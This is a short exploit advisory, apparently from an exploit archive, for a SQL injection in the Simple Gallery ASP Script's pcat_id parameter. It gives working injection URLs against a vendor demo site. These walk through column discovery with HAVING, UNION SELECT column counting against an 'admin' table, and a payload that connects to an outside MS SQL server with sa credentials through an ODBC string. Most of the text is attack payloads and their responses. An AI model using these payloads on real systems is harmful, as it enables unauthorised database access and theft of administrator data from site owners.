Simple Gallery ASP Script suffers from a remote SQL injection vulnerability.
d2af477a8bd61094cc124cb7ae0a491559fbc59ce23118f88ea0de7e2c0979af
#################Simple gallery (pcat_id) SQL Injection Vulnerability#########################
#######By: e.wiZz! ew1zz@hotmail.com
#####Info: Bosnian Idiot FTW!
#####Site: infected.blogger.ba
#####Greetz: Luigi Auriemma,str0ke
In the wild....
######################################################################################
#####Project Name: Simple Gallery ASP Script
#####Site: preprojects.com
#####Vulnerability: SQL Injection
#####PoC on demo site :
http://www.preprojects.com/pgallery/gallery/
Ok,we have table "admin",but we need to find how many columns is there,to extract somethin' ....but we need to know at least one column to start....lets find one :)
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 HAVING sum('inthewild')='inthewild'
we got photo_id ....lets find how many columns is there:
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id from admin
we got error: The number of columns in the two selected tables or queries of a union query do not match. Try something else...
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id,null,null,null,null,null,null,null,null from admin
response: No value given for one or more required parameters. ......so its 9 columns...i wont continue with it.
Connect to a network accessible MS SQL instance (heavy injection :)
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 UNION SELECT *
FROM [ODBC;DRIVER=SQL SERVER;Server=<serverinthewild>,<Port>;UID=sa;PWD=<PASSWORD>;
DATABASE=master].Information_Schema.Tables where '1'='1'or'bosnian'='idiot'
Almost tutorial :)